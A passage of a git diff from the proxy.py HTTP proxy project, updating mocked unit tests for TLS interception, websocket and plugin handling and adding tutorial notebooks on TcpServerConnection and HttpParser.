+ self.proxy_plugin.return_value.on_access_log.assert_not_called() self.mock_server_conn.assert_called_with(host, port) self.mock_server_conn.return_value.connection.setblocking.assert_called_with( @@ -173,9 +232,6 @@ async def asyncReturnBool(val: bool) -> bool: self.mock_ssl_context.assert_called_with( ssl.Purpose.SERVER_AUTH, cafile=str(DEFAULT_CA_FILE), ) - # self.assertEqual(self.mock_ssl_context.return_value.options, - # ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | - # ssl.OP_NO_TLSv1_1) self.assertEqual(plain_connection.setblocking.call_count, 2) self.mock_ssl_context.return_value.wrap_socket.assert_called_with( plain_connection, server_hostname=host, @@ -183,10 +239,10 @@ async def asyncReturnBool(val: bool) -> bool: self.assertEqual(self.mock_sign_csr.call_count, 1) self.assertEqual(self.mock_gen_csr.call_count, 1) self.assertEqual(self.mock_gen_public_key.call_count, 1) - self.assertEqual(ssl_connection.setblocking.call_count, 1) + self.assertEqual(upstream_tls_sock.setblocking.call_count, 1) self.assertEqual( self.mock_server_conn.return_value._conn, - ssl_connection, + upstream_tls_sock, ) self._conn.send.assert_called_with( PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, @@ -204,15 +260,42 @@ async def asyncReturnBool(val: bool) -> bool: self.assertEqual(self._conn.setblocking.call_count, 2) self.assertEqual( self.protocol_handler.work.connection, - self.mock_ssl_wrap.return_value, + client_tls_sock, ) # Assert connection references for all other plugins is updated - # self.assertEqual( - # self.plugin.return_value.client._conn, - # self.mock_ssl_wrap.return_value, - # ) self.assertEqual( self.proxy_plugin.return_value.client._conn, - self.mock_ssl_wrap.return_value, + client_tls_sock, ) + + # Now process the GET request + await self.protocol_handler._run_once() + self.plugin.assert_not_called() + self.proxy_plugin.assert_called_once() + + # Lifecycle callbacks still not invoked + self.proxy_plugin.return_value.handle_client_data.assert_not_called() + self.proxy_plugin.return_value.handle_upstream_chunk.assert_not_called() + self.proxy_plugin.return_value.on_upstream_connection_close.assert_not_called() + self.proxy_plugin.return_value.on_access_log.assert_not_called() + # Only handle client request lifecycle must be called again + self.proxy_plugin.return_value.resolve_dns.assert_called_once_with( + host, port, + ) + self.proxy_plugin.return_value.before_upstream_connection.assert_called() + self.assertEqual( + self.proxy_plugin.return_value.handle_client_request.call_count, + 2, + ) + self.proxy_plugin.return_value.do_intercept.assert_called_once() + + callback_request = \ + self.proxy_plugin.return_value.handle_client_request.call_args_list[1][0][0] + self.assertEqual(callback_request.host, None) + self.assertEqual(callback_request.port, 80) + self.assertEqual(callback_request.header(b'Host'), headers[b'Host']) + assert callback_request._url + self.assertEqual(callback_request._url.remainder, b'/') + self.assertEqual(callback_request.method, httpMethods.GET) + self.assertEqual(callback_request.is_https_tunnel, False) diff --git a/tests/http/test_protocol_handler.py b/tests/http/test_protocol_handler.py index a2425fd723..0ba0b44284 100644 --- a/tests/http/test_protocol_handler.py +++ b/tests/http/test_protocol_handler.py @@ -230,7 +230,7 @@ async def assert_tunnel_response( server.closed = False parser = HttpParser(httpParserTypes.RESPONSE_PARSER) - parser.parse(self.protocol_handler.work.buffer[0].tobytes()) + parser.parse(self.protocol_handler.work.buffer[0]) 
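+        # work.buffer holds memoryview packets and parse() accepts them
+        # directly now, avoiding an intermediate tobytes() copy.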
self.assertEqual(parser.state, httpParserStates.COMPLETE) assert parser.code is not None self.assertEqual(int(parser.code), 200) @@ -456,7 +456,7 @@ async def assert_data_queued( CRLF, ]) server.queue.assert_called_once() - self.assertEqual(server.queue.call_args_list[0][0][0].tobytes(), pkt) + self.assertEqual(server.queue.call_args_list[0][0][0], pkt) server.buffer_size.return_value = len(pkt) async def assert_data_queued_to_server(self, server: mock.Mock) -> None: diff --git a/tests/http/test_responses.py b/tests/http/test_responses.py new file mode 100644 index 0000000000..36263a36d1 --- /dev/null +++ b/tests/http/test_responses.py @@ -0,0 +1,113 @@ +# -*- coding: utf-8 -*- +""" + proxy.py + ~~~~~~~~ + ⚡⚡⚡ Fast, Lightweight, Pluggable, TLS interception capable proxy server focused on + Network monitoring, controls & Application development, testing, debugging. + + :copyright: (c) 2013-present by Abhinav Singh and contributors. + :license: BSD, see LICENSE for more details. + + .. spelling:: + + nd +""" +import gzip + +import unittest + +from proxy.http.parser import ChunkParser +from proxy.http.responses import okResponse +from proxy.common.constants import CRLF + + +class TestResponses(unittest.TestCase): + + def test_basic(self) -> None: + self.assertEqual( + okResponse(), + b'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n', + ) + self.assertEqual( + okResponse( + headers={ + b'X-Custom-Header': b'my value', + }, + ), + b'HTTP/1.1 200 OK\r\nX-Custom-Header: my value\r\nContent-Length: 0\r\n\r\n', + ) + self.assertEqual( + okResponse( + content=b'Hello World', + headers={ + b'X-Custom-Header': b'my value', + }, + ), + b'HTTP/1.1 200 OK\r\nX-Custom-Header: my value\r\nContent-Length: 11\r\n\r\nHello World', + ) + + def test_compression(self) -> None: + content = b'H' * 21 + self.assertEqual( + gzip.decompress( + okResponse( + content=content, + headers={ + b'X-Custom-Header': b'my value', + }, + ).tobytes().split(CRLF + CRLF, maxsplit=1)[-1], + ), + content, + ) + self.assertEqual( + okResponse( + content=content, + headers={ + b'Host': b'jaxl.com', + }, + min_compression_length=len(content), + ), + b'HTTP/1.1 200 OK\r\nHost: jaxl.com\r\nContent-Length: 21\r\n\r\nHHHHHHHHHHHHHHHHHHHHH', + ) + + def test_close_header(self) -> None: + self.assertEqual( + okResponse( + content=b'Hello World', + headers={ + b'Host': b'jaxl.com', + }, + conn_close=True, + ), + b'HTTP/1.1 200 OK\r\nHost: jaxl.com\r\nContent-Length: 11\r\nConnection: close\r\n\r\nHello World', + ) + + def test_chunked_without_compression(self) -> None: + chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5) + self.assertEqual( + okResponse( + content=chunks, + headers={ + b'Transfer-Encoding': b'chunked', + }, + # Avoid compressing chunks for demo purposes here + # Ideally you should omit this flag and send + # compressed chunks. 
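+                # okResponse() compresses only content strictly longer
+                # than min_compression_length, so passing len(chunks)
+                # here keeps the pre-encoded chunks byte-for-byte intact.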
+ min_compression_length=len(chunks), + ), + b'HTTP/1.1 200 OK\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nHello\r\n5\r\n Worl\r\n1\r\nd\r\n0\r\n\r\n', + ) + + def test_chunked_with_compression(self) -> None: + chunks = ChunkParser.to_chunks(b'Hello World', chunk_size=5) + self.assertEqual( + gzip.decompress( + okResponse( + content=chunks, + headers={ + b'Transfer-Encoding': b'chunked', + }, + ).tobytes().split(CRLF + CRLF, maxsplit=1)[-1], + ), + chunks, + ) diff --git a/tests/http/websocket/test_websocket_client.py b/tests/http/websocket/test_websocket_client.py index 4e31e48e30..92df52eb93 100644 --- a/tests/http/websocket/test_websocket_client.py +++ b/tests/http/websocket/test_websocket_client.py @@ -8,6 +8,8 @@ :copyright: (c) 2013-present by Abhinav Singh and contributors. :license: BSD, see LICENSE for more details. """ +import selectors + import unittest from unittest import mock @@ -15,18 +17,19 @@ build_websocket_handshake_request, build_websocket_handshake_response, ) from proxy.http.websocket import WebsocketFrame, WebsocketClient -from proxy.common.constants import DEFAULT_PORT +from proxy.common.constants import DEFAULT_PORT, DEFAULT_BUFFER_SIZE class TestWebsocketClient(unittest.TestCase): - @mock.patch('proxy.http.websocket.client.socket.gethostbyname') @mock.patch('base64.b64encode') + @mock.patch('proxy.http.websocket.client.socket.gethostbyname') @mock.patch('proxy.http.websocket.client.new_socket_connection') - def test_handshake( - self, mock_connect: mock.Mock, - mock_b64encode: mock.Mock, - mock_gethostbyname: mock.Mock, + def test_handshake_success( + self, + mock_connect: mock.Mock, + mock_gethostbyname: mock.Mock, + mock_b64encode: mock.Mock, ) -> None: key = b'MySecretKey' mock_b64encode.return_value = key @@ -35,9 +38,71 @@ def test_handshake( build_websocket_handshake_response( WebsocketFrame.key_to_accept(key), ) + mock_connect.assert_not_called() client = WebsocketClient(b'localhost', DEFAULT_PORT) + mock_connect.assert_called_once() mock_connect.return_value.send.assert_not_called() client.handshake() mock_connect.return_value.send.assert_called_with( build_websocket_handshake_request(key), ) + mock_connect.return_value.recv.assert_called_once_with( + DEFAULT_BUFFER_SIZE, + ) + + @mock.patch('base64.b64encode') + @mock.patch('selectors.DefaultSelector') + @mock.patch('proxy.http.websocket.client.new_socket_connection') + def test_send_recv_frames_success( + self, + mock_connect: mock.Mock, + mock_selector: mock.Mock, + mock_b64encode: mock.Mock, + ) -> None: + key = b'MySecretKey' + mock_b64encode.return_value = key + mock_connect.return_value.recv.side_effect = [ + build_websocket_handshake_response( + WebsocketFrame.key_to_accept(key), + ), + WebsocketFrame.text(b'world'), + ] + + def on_message(frame: WebsocketFrame) -> None: + assert frame.build() == WebsocketFrame.text(b'world') + + client = WebsocketClient( + b'localhost', DEFAULT_PORT, on_message=on_message, + ) + mock_selector.assert_called_once() + client.handshake() + client.queue(memoryview(WebsocketFrame.text(b'hello'))) + mock_connect.return_value.send.assert_called_once() + mock_selector.return_value.select.side_effect = [ + [ + (mock.Mock(), selectors.EVENT_WRITE), + ], + ] + client.run_once() + self.assertEqual(mock_connect.return_value.send.call_count, 2) + mock_selector.return_value.select.side_effect = [ + [ + (mock.Mock(), selectors.EVENT_READ), + ], + ] + client.run_once() + + @mock.patch('selectors.DefaultSelector') + @mock.patch('proxy.http.websocket.client.new_socket_connection') + 
def test_run( + self, + mock_connect: mock.Mock, + mock_selector: mock.Mock, + ) -> None: + mock_selector.return_value.select.side_effect = KeyboardInterrupt + client = WebsocketClient(b'localhost', DEFAULT_PORT) + client.run() + mock_connect.return_value.shutdown.assert_called_once() + mock_connect.return_value.close.assert_called_once() + mock_selector.return_value.unregister.assert_called_once_with(mock_connect.return_value) + mock_selector.return_value.close.assert_called_once() diff --git a/tests/plugin/test_http_proxy_plugins.py b/tests/plugin/test_http_proxy_plugins.py index 5b9e30d12f..1a04c288dd 100644 --- a/tests/plugin/test_http_proxy_plugins.py +++ b/tests/plugin/test_http_proxy_plugins.py @@ -28,6 +28,9 @@ from proxy.common.flag import FlagParser from proxy.http.parser import HttpParser, httpParserTypes from proxy.common.utils import bytes_, build_http_request, build_http_response +from proxy.http.responses import ( + NOT_FOUND_RESPONSE_PKT, PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, +) from proxy.common.constants import DEFAULT_HTTP_PORT, PROXY_AGENT_HEADER_VALUE from .utils import get_plugin_by_test_name from ..test_assertions import Assertions @@ -90,6 +93,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Content-Length': bytes_(len(original)), }, body=original, + no_ua=True, ) self.mock_selector.return_value.select.side_effect = [ [( @@ -117,6 +121,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, body=modified, + no_ua=True, ), ) @@ -153,7 +158,7 @@ async def test_proposed_rest_api_plugin(self) -> None: self.mock_server_conn.assert_not_called() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( response.header(b'content-type'), @@ -186,6 +191,7 @@ async def test_redirect_to_custom_server_plugin(self) -> None: headers={ b'Host': b'example.org', }, + no_ua=True, ) self._conn.recv.return_value = request self.mock_selector.return_value.select.side_effect = [ @@ -212,9 +218,44 @@ async def test_redirect_to_custom_server_plugin(self) -> None: b'Host': upstream.netloc, b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, + no_ua=True, ), ) + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_redirect_to_custom_server_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_redirect_to_custom_server_plugin_skips_https(self) -> None: + request = build_http_request( + b'CONNECT', b'jaxl.com:443', + headers={ + b'Host': b'jaxl.com:443', + }, + ) + self._conn.recv.return_value = request + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + self.mock_server_conn.assert_called_with('jaxl.com', 443) + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + PROXY_TUNNEL_ESTABLISHED_RESPONSE_PKT, + ) + @pytest.mark.asyncio # type: ignore[misc] @pytest.mark.parametrize( "_setUp", @@ -246,7 +287,7 @@ async def test_filter_by_upstream_host_plugin(self) -> None: self.mock_server_conn.assert_not_called() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.I_AM_A_TEAPOT, reason=b'I\'m 
a tea pot', @@ -268,6 +309,7 @@ async def test_man_in_the_middle_plugin(self) -> None: headers={ b'Host': b'super.secure', }, + no_ua=True, ) self._conn.recv.return_value = request @@ -326,8 +368,12 @@ def closed() -> bool: b'Host': b'super.secure', b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, }, + no_ua=True, ) - server.queue.assert_called_once_with(queued_request) + server.queue.assert_called_once() + print(server.queue.call_args_list[0][0][0].tobytes()) + print(queued_request) + self.assertEqual(server.queue.call_args_list[0][0][0], queued_request) # Server write await self.protocol_handler._run_once() @@ -342,7 +388,7 @@ def closed() -> bool: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), @@ -379,10 +425,129 @@ async def test_filter_by_url_regex_plugin(self) -> None: await self.protocol_handler._run_once() self.assertEqual( - self.protocol_handler.work.buffer[0].tobytes(), + self.protocol_handler.work.buffer[0], build_http_response( status_code=httpStatusCodes.NOT_FOUND, reason=b'Blocked', conn_close=True, ), ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin(self) -> None: + request = build_http_request( + b'GET', b'http://t/', + headers={ + b'Host': b't', + }, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + + await self.protocol_handler._run_once() + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + build_http_response( + status_code=httpStatusCodes.SEE_OTHER, + reason=b'See Other', + headers={ + b'Location': b'http://twitter.com/', + }, + conn_close=True, + ), + ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin_unknown(self) -> None: + request = build_http_request( + b'GET', b'http://unknown/', + headers={ + b'Host': b'unknown', + }, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + self.assertEqual( + self.protocol_handler.work.buffer[0].tobytes(), + NOT_FOUND_RESPONSE_PKT, + ) + + @pytest.mark.asyncio # type: ignore[misc] + @pytest.mark.parametrize( + "_setUp", + ( + ('test_shortlink_plugin'), + ), + indirect=True, + ) # type: ignore[misc] + async def test_shortlink_plugin_external(self) -> None: + request = build_http_request( + b'GET', b'http://jaxl.com/', + headers={ + b'Host': b'jaxl.com', + }, + no_ua=True, + ) + self._conn.recv.return_value = request + + self.mock_selector.return_value.select.side_effect = [ + [( + selectors.SelectorKey( + fileobj=self._conn.fileno(), + fd=self._conn.fileno(), + events=selectors.EVENT_READ, + data=None, + ), + selectors.EVENT_READ, + )], + ] + await self.protocol_handler._run_once() + 
self.mock_server_conn.assert_called_once_with('jaxl.com', 80) + self.mock_server_conn.return_value.queue.assert_called_with( + build_http_request( + b'GET', b'/', + headers={ + b'Host': b'jaxl.com', + b'Via': b'1.1 %s' % PROXY_AGENT_HEADER_VALUE, + }, + no_ua=True, + ), + ) + self.assertFalse(self.protocol_handler.work.has_buffer()) diff --git a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py index 77345a41d5..64dd9440f6 100644 --- a/tests/plugin/test_http_proxy_plugins_with_tls_interception.py +++ b/tests/plugin/test_http_proxy_plugins_with_tls_interception.py @@ -95,7 +95,9 @@ def mock_connection() -> Any: # Do not mock the original wrap method self.server.wrap.side_effect = \ - lambda x, y: TcpServerConnection.wrap(self.server, x, y) + lambda x, y, as_non_blocking: TcpServerConnection.wrap( + self.server, x, y, as_non_blocking=as_non_blocking, + ) self.server.has_buffer.side_effect = has_buffer type(self.server).closed = mocker.PropertyMock(side_effect=closed) @@ -150,7 +152,9 @@ def send(raw: bytes) -> int: self._conn.send.side_effect = send self._conn.recv.return_value = build_http_request( - httpMethods.CONNECT, b'uni.corn:443', + httpMethods.CONNECT, + b'uni.corn:443', + no_ua=True, ) @pytest.mark.asyncio # type: ignore[misc] @@ -191,6 +195,7 @@ async def test_modify_post_data_plugin(self) -> None: b'Content-Type': b'application/x-www-form-urlencoded', }, body=original, + no_ua=True, ) await self.protocol_handler._run_once() self.server.queue.assert_called_once() @@ -240,6 +245,7 @@ async def test_man_in_the_middle_plugin(self) -> None: headers={ b'Host': b'uni.corn', }, + no_ua=True, ) self.client_ssl_connection.recv.return_value = request @@ -257,7 +263,7 @@ async def test_man_in_the_middle_plugin(self) -> None: ) await self.protocol_handler._run_once() response = HttpParser(httpParserTypes.RESPONSE_PARSER) - response.parse(self.protocol_handler.work.buffer[0].tobytes()) + response.parse(self.protocol_handler.work.buffer[0]) assert response.body self.assertEqual( gzip.decompress(response.body), diff --git a/tests/plugin/utils.py b/tests/plugin/utils.py index 7e6335057d..400e874d53 100644 --- a/tests/plugin/utils.py +++ b/tests/plugin/utils.py @@ -11,9 +11,9 @@ from typing import Type from proxy.plugin import ( - CacheResponsesPlugin, ManInTheMiddlePlugin, ModifyPostDataPlugin, - ProposedRestApiPlugin, FilterByURLRegexPlugin, FilterByUpstreamHostPlugin, - RedirectToCustomServerPlugin, + ShortLinkPlugin, CacheResponsesPlugin, ManInTheMiddlePlugin, + ModifyPostDataPlugin, ProposedRestApiPlugin, FilterByURLRegexPlugin, + FilterByUpstreamHostPlugin, RedirectToCustomServerPlugin, ) from proxy.http.proxy import HttpProxyBasePlugin @@ -34,4 +34,6 @@ def get_plugin_by_test_name(test_name: str) -> Type[HttpProxyBasePlugin]: plugin = ManInTheMiddlePlugin elif test_name == 'test_filter_by_url_regex_plugin': plugin = FilterByURLRegexPlugin + elif test_name == 'test_shortlink_plugin': + plugin = ShortLinkPlugin return plugin diff --git a/tutorial/connections.ipynb b/tutorial/connections.ipynb new file mode 100644 index 0000000000..f2f52391a6 --- /dev/null +++ b/tutorial/connections.ipynb @@ -0,0 +1,130 @@ +{ + "cells": [ + { + "cell_type": "markdown", + "metadata": {}, + "source": [ + "# Connections\n", + "\n", + "## Buffered Socket Connections\n", + "\n", + "`proxy.py` core provides buffered socket implementations. In most of the cases, a buffered connection will be desired. 
With buffered connections, we can queue data from our application code while leaving the responsibility of flushing the buffer to the core.\n",
+    "\n",
+    "One of the buffered connection classes is `TcpServerConnection`, which manages a connection to an upstream server. Optionally, we can also enable encryption _(TLS)_ before communicating with the server.\n",
+    "\n",
+    "Import the following:"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from proxy.core.connection import TcpServerConnection\n",
+    "from proxy.common.utils import build_http_request\n",
+    "from proxy.http.methods import httpMethods\n",
+    "from proxy.http.parser import HttpParser, httpParserTypes\n",
+    "\n",
+    "request = build_http_request(\n",
+    "    method=httpMethods.GET,\n",
+    "    url=b'/',\n",
+    "    headers={\n",
+    "        b'Host': b'jaxl.com',\n",
+    "    }\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Let's use `TcpServerConnection` to make an HTTP web server request."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "http_client = TcpServerConnection('jaxl.com', 80)\n",
+    "http_client.connect()\n",
+    "http_client.queue(memoryview(request))\n",
+    "http_client.flush()\n",
+    "\n",
+    "http_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n",
+    "while not http_response.is_complete:\n",
+    "    http_response.parse(http_client.recv())\n",
+    "http_client.close()\n",
+    "\n",
+    "print(http_response.build_response())\n",
+    "\n",
+    "assert http_response.is_complete\n",
+    "assert http_response.code == b'301'\n",
+    "assert http_response.reason == b'Moved Permanently'\n",
+    "assert http_response.has_header(b'location')\n",
+    "assert http_response.header(b'location') == b'https://jaxl.com/'"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Let's use `TcpServerConnection` to make an HTTPS web server request."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "https_client = TcpServerConnection('jaxl.com', 443)\n",
+    "https_client.connect()\n",
+    "https_client.wrap(hostname='jaxl.com')\n",
+    "\n",
+    "https_client.queue(memoryview(request))\n",
+    "https_client.flush()\n",
+    "\n",
+    "https_response = HttpParser(httpParserTypes.RESPONSE_PARSER)\n",
+    "while not https_response.is_complete:\n",
+    "    https_response.parse(https_client.recv())\n",
+    "https_client.close()\n",
+    "\n",
+    "print(https_response.build_response())\n",
+    "\n",
+    "assert https_response.is_complete\n",
+    "assert https_response.code == b'200'\n",
+    "assert https_response.reason == b'OK'\n",
+    "assert https_response.has_header(b'content-type')\n",
+    "assert https_response.header(b'content-type') == b'text/html'"
+   ]
+  }
+ ],
+ "metadata": {
+  "interpreter": {
+   "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.10.0 64-bit ('venv310': venv)",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.10.0"
+  },
+  "orig_nbformat": 4
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/tutorial/http_parser.ipynb b/tutorial/http_parser.ipynb
new file mode 100644
index 0000000000..d0800afc25
--- /dev/null
+++ b/tutorial/http_parser.ipynb
@@ -0,0 +1,182 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# HttpParser\n",
+    "\n",
+    "The `HttpParser` class is at the heart of everything related to HTTP. It is used by the web server and proxy server cores and their plugin ecosystem. As the name suggests, it is capable of parsing both HTTP request and response packets. It can also parse HTTP look-alike protocols such as ICAP and SIP.
 Most importantly, remember that `HttpParser` was originally written to handle HTTP packets arriving in the context of a proxy server, and to date its default behavior favors that flavor.\n",
+    "\n",
+    "Let's start by parsing an HTTP web request using `HttpParser`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "from proxy.http.methods import httpMethods\n",
+    "from proxy.http.parser import HttpParser, httpParserTypes\n",
+    "from proxy.common.constants import HTTP_1_1\n",
+    "\n",
+    "get_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n",
+    "get_request.parse(b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n')\n",
+    "\n",
+    "print(get_request.build())\n",
+    "\n",
+    "assert get_request.is_complete\n",
+    "assert get_request.method == httpMethods.GET\n",
+    "assert get_request.version == HTTP_1_1\n",
+    "assert get_request.host is None\n",
+    "assert get_request.port == 80\n",
+    "assert get_request._url is not None\n",
+    "assert get_request._url.remainder == b'/'\n",
+    "assert get_request.has_header(b'host')\n",
+    "assert get_request.header(b'host') == b'jaxl.com'\n",
+    "assert len(get_request.headers) == 1"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Next, let's parse an HTTP proxy request using `HttpParser`"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'GET / HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n",
+      "b'GET http://jaxl.com:80/ HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "proxy_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n",
+    "proxy_request.parse(b'GET http://jaxl.com/ HTTP/1.1\\r\\nHost: jaxl.com\\r\\n\\r\\n')\n",
+    "\n",
+    "print(proxy_request.build())\n",
+    "print(proxy_request.build(for_proxy=True))\n",
+    "\n",
+    "assert proxy_request.is_complete\n",
+    "assert proxy_request.method == httpMethods.GET\n",
+    "assert proxy_request.version == HTTP_1_1\n",
+    "assert proxy_request.host == b'jaxl.com'\n",
+    "assert proxy_request.port == 80\n",
+    "assert proxy_request._url is not None\n",
+    "assert proxy_request._url.remainder == b'/'\n",
+    "assert proxy_request.has_header(b'host')\n",
+    "assert proxy_request.header(b'host') == b'jaxl.com'\n",
+    "assert len(proxy_request.headers) == 1"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "Notice how `proxy_request.build()` and `proxy_request.build(for_proxy=True)` behave.
 Also, notice how the `proxy_request.host` field is populated for an HTTP proxy packet, but not for the earlier HTTP web request packet.\n",
+    "\n",
+    "To conclude, let's parse an HTTPS proxy request"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "b'CONNECT / HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n'\n",
+      "b'CONNECT jaxl.com:443 HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n'\n"
+     ]
+    }
+   ],
+   "source": [
+    "connect_request = HttpParser(httpParserTypes.REQUEST_PARSER)\n",
+    "connect_request.parse(b'CONNECT jaxl.com:443 HTTP/1.1\\r\\nHost: jaxl.com:443\\r\\n\\r\\n')\n",
+    "\n",
+    "print(connect_request.build())\n",
+    "print(connect_request.build(for_proxy=True))\n",
+    "\n",
+    "assert connect_request.is_complete\n",
+    "assert connect_request.is_https_tunnel\n",
+    "assert connect_request.version == HTTP_1_1\n",
+    "assert connect_request.host == b'jaxl.com'\n",
+    "assert connect_request.port == 443\n",
+    "assert connect_request._url is not None\n",
+    "assert connect_request._url.remainder is None\n",
+    "assert connect_request.has_header(b'host')\n",
+    "assert connect_request.header(b'host') == b'jaxl.com:443'\n",
+    "assert len(connect_request.headers) == 1"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "### Take Away\n",
+    "\n",
+    "- `host` and `port` attributes represent the `host:port` present in the HTTP packet request line. For comparison, below are all three request lines again. Notice how a `host:port` is missing only from the web server GET request\n",
+    "  | Request Type      | Request Line     |\n",
+    "  | ------------------| ---------------- |\n",
+    "  | `get_request`     | `GET / HTTP/1.1` |\n",
+    "  | `proxy_request`   | `GET http://jaxl.com/ HTTP/1.1` |\n",
+    "  | `connect_request` | `CONNECT jaxl.com:443 HTTP/1.1` |\n",
+    "- `_url` attribute is an instance of the `Url` parser and contains parsed information about the URL found in the request line\n",
+    "\n",
+    "A few of the other handy properties within `HttpParser` are:\n",
+    "\n",
+    "- `is_complete`\n",
+    "- `is_http_1_1_keep_alive`\n",
+    "- `is_connection_upgrade`\n",
+    "- `is_https_tunnel`\n",
+    "- `is_chunked_encoded`\n",
+    "- `content_expected`\n",
+    "- `body_expected`"
+   ]
+  }
+ ],
+ "metadata": {
+  "interpreter": {
+   "hash": "da9d6927d62b2b95bde149eedfbd5367cb7f465aad65a736f49c99ee3db39df7"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.10.0 64-bit ('venv310': venv)",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.10.0"
+  },
+  "orig_nbformat": 4
+ },
+ "nbformat": 4,
+ "nbformat_minor": 2
+}
diff --git a/tutorial/requests.ipynb b/tutorial/requests.ipynb
new file mode 100644
index 0000000000..fb2cc36393
--- /dev/null
+++ b/tutorial/requests.ipynb
@@ -0,0 +1,273 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Http Requests\n",
+    "\n",
+    "## Usage\n",
+    "\n",
+    "To construct an HTTP request packet, you have a variety of facilities available.\n",
+    "\n",
